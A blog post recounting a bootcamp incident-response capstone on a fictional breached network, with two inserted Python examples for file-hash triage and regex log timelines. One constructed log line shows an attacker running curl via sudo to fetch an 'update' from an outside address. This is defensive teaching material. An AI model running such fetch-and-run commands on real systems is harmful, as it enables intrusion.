Cybersecurity Capstone

Owen H Makin
3 min read · Jan 16, 2021

Throughout the Flatiron cyber security analytics bootcamp we learned many important pieces of the cyber security world in our GRC, Network, Systems, Hunt, SIEM, Strategy, and Threat courses. The knowledge we gained from these courses culminated in our Capstone project.

The premise of the Capstone was that a fictitious organization called ACME had its network compromised and, as a result, its cyber security team was let go. Three other students and I were then tasked with determining the cause and depth of the compromise and the steps we could take to ensure it would not happen again. There was also the added challenge that we were all working remotely and were spread across multiple time zones.

There was no incident response plan in place, so it was up to us to break the Capstone down into manageable tasks and start creating a timeline, as the three-week deadline was quickly approaching. Delegating a set of machines to each team member really helped make sure we were able to thoroughly investigate every machine and that all ground was being covered.

With the planning stage completed, we were able to move on to the actual response. We quickly found a few threats through a combination of scanning and digital forensics and were able to apply a few lessons from our Hunt class in a very interesting way. Once a few pieces of malicious software were identified, we were able to hash them and check the hashes against various online tools. This helped us find the same software in public repositories and read the readme files in order to better understand what we had found.
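The hashing step described above, as an added example that is not the author's or the capstone team's code: it computes MD5, SHA-1 and SHA-256 digests of suspect files in chunks and checks the SHA-256 against a known-bad list. The sample files and the known-bad set are constructed here so the script runs offline; in a real investigation the list would come from a threat-intelligence lookup rather than from the file itself.

```python
"""Added example: hash suspected malicious files and compare the digests
against a list of known-bad hashes. File names, contents and the known-bad
set are constructed for this example, not artifacts from the ACME capstone."""
import hashlib
import os
import tempfile

# Constructed sample "artifacts": file name -> contents. In a real case these
# would be the suspicious binaries pulled from the compromised hosts.
SAMPLE_FILES = {
    "svchost_update.exe": b"MZ\x90\x00 constructed fake dropper payload",
    "notes.txt": b"meeting notes, nothing unusual",
}


def file_hashes(path, chunk_size=1 << 16):
    """Return MD5, SHA-1 and SHA-256 hex digests of a file, read in chunks
    so that large binaries do not have to be loaded into memory at once."""
    hashers = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def triage(paths, known_bad):
    """Classify each path as 'known-bad' or 'unknown' by SHA-256 lookup.
    'unknown' only means the hash was not in the list, not that the file is clean."""
    report = {}
    for path in paths:
        digests = file_hashes(path)
        verdict = "known-bad" if digests["sha256"] in known_bad else "unknown"
        report[os.path.basename(path)] = {"sha256": digests["sha256"], "verdict": verdict}
    return report


def demo():
    """Write the constructed samples to a temp dir and triage them."""
    tmp = tempfile.mkdtemp()
    paths = []
    for name, data in SAMPLE_FILES.items():
        p = os.path.join(tmp, name)
        with open(p, "wb") as fh:
            fh.write(data)
        paths.append(p)
    # Constructed known-bad list: the sample dropper's own digest, so the
    # example runs offline. In practice this comes from a threat-intel feed.
    known_bad = {hashlib.sha256(SAMPLE_FILES["svchost_update.exe"]).hexdigest()}
    return triage(paths, known_bad)


if __name__ == "__main__":
    for name, info in demo().items():
        print(f"{name}: {info['verdict']} sha256={info['sha256']}")
```

Keeping all three digests is deliberate: older public reports and repositories often list only MD5 or SHA-1, so having every common digest on hand makes matching against those sources easier.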

I also recommended that we scan the network to determine whether any outside machines were communicating with it. This drew on lessons from both our Network and Systems classes. We used Nmap and Zenmap scans, which gave us a better understanding of what was truly on the network and which protocols were or were not sending information.

Now that we had actually found evidence that ACME had been compromised, it was time to create a timeline for the attack. This is where the skills we had gained from Security Information and Event Management (SIEM) really shined. We downloaded logs from the various machines and imported them into an instance of Splunk. By using various regex filters we were able to paint a picture of who the threat was, what was compromised, where the threat was operating from, and when it compromised the network.
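The regex-driven timeline work described above, as an added example rather than the team's Splunk searches: plain Python stands in for the SIEM, one regular expression per event type pulls out the who (user), where (source address), what (command) and when (timestamp), and the events are sorted into a timeline. The log lines, hostnames and IP addresses are constructed for the example, and the syslog year is assumed because syslog timestamps do not carry one.

```python
"""Added example: build an attack timeline from host logs with regular
expressions. The log lines, hostnames and addresses below are constructed
for this example and the year 2021 is an assumption for the syslog format."""
import re
from datetime import datetime

# Constructed log excerpt: an SSH auth log and a sudo entry from one host,
# plus an unrelated login on a second host.
SAMPLE_LOGS = """\
Jan 14 02:13:05 web01 sshd[1021]: Failed password for admin from 203.0.113.7 port 51022 ssh2
Jan 14 02:13:09 web01 sshd[1021]: Failed password for admin from 203.0.113.7 port 51023 ssh2
Jan 14 02:14:41 web01 sshd[1030]: Accepted password for admin from 203.0.113.7 port 51031 ssh2
Jan 14 02:20:12 web01 sudo: admin : TTY=pts/0 ; COMMAND=/usr/bin/curl http://203.0.113.7/update
Jan 14 08:00:00 db01 sshd[2201]: Accepted publickey for backup from 10.0.0.5 port 44010 ssh2
"""

TS = r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "

# One regex per event type; each captures the fields the timeline needs.
PATTERNS = {
    "ssh_failed": re.compile(
        TS + r"sshd\[\d+\]: Failed password for (?P<user>\S+) from (?P<src>[\d.]+)"),
    "ssh_accepted": re.compile(
        TS + r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<src>[\d.]+)"),
    "sudo": re.compile(
        TS + r"sudo: +(?P<user>\S+) .*COMMAND=(?P<cmd>.+)$"),
}


def parse_line(line, year=2021):
    """Match a line against the known patterns; return an event dict or None."""
    for kind, rx in PATTERNS.items():
        m = rx.match(line)
        if m:
            ev = m.groupdict()
            ev["kind"] = kind
            # syslog timestamps carry no year; the caller supplies the assumed one
            ev["time"] = datetime.strptime(f"{year} {ev.pop('ts')}", "%Y %b %d %H:%M:%S")
            return ev
    return None


def build_timeline(text, year=2021):
    """Parse every recognised line and order the events chronologically."""
    events = [e for e in (parse_line(l, year) for l in text.splitlines()) if e]
    return sorted(events, key=lambda e: e["time"])


def suspicious_sources(timeline, failed_threshold=2):
    """Flag source addresses that fail at least `failed_threshold` logins
    and then succeed, the classic brute-force-then-login pattern."""
    fails = {}
    flagged = set()
    for ev in timeline:
        src = ev.get("src")
        if ev["kind"] == "ssh_failed":
            fails[src] = fails.get(src, 0) + 1
        elif ev["kind"] == "ssh_accepted" and fails.get(src, 0) >= failed_threshold:
            flagged.add(src)
    return flagged


if __name__ == "__main__":
    tl = build_timeline(SAMPLE_LOGS)
    for ev in tl:
        print(ev["time"], ev["host"], ev["kind"], ev.get("user"), ev.get("src") or ev.get("cmd"))
    print("suspicious sources:", suspicious_sources(tl))
```

Sorting by parsed timestamp rather than by file order matters once logs from several hosts are merged, which is exactly the situation when evidence is pulled from many machines into one SIEM.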

In order to ensure the network was properly set up and free from vulnerabilities, a team member ran a Rapid7 scan to check all of the machines on the network for vulnerabilities. I assisted in going through the detailed scan and came up with an outline of the various vulnerabilities it had detected.

With all of the data gathered, we began to compile it into our research report. Each team member focused on outlining the tasks they had been delegated, and then we all worked together to make sure our findings were cohesive. We were also able to include screenshots of various scans and important findings in the report.

Since our presentation was going to be live, we made sure we practiced our slide deck as a group and that we all understood how we were going to present. While our main report was a few dozen pages, our slide deck was far more condensed and left out many of the technical details. We presented to the CISO of our fictitious organization, who was one of our cohort leads, as well as other members of the Flatiron bootcamp. Our presentation was incredibly professional, and we were given great praise for our organizational skills regarding the presentation. While in the end we did miss a couple of clues, our skills in cyber security became a lot stronger.

I look forward to the rest of the challenges I will face as a cyber security professional.
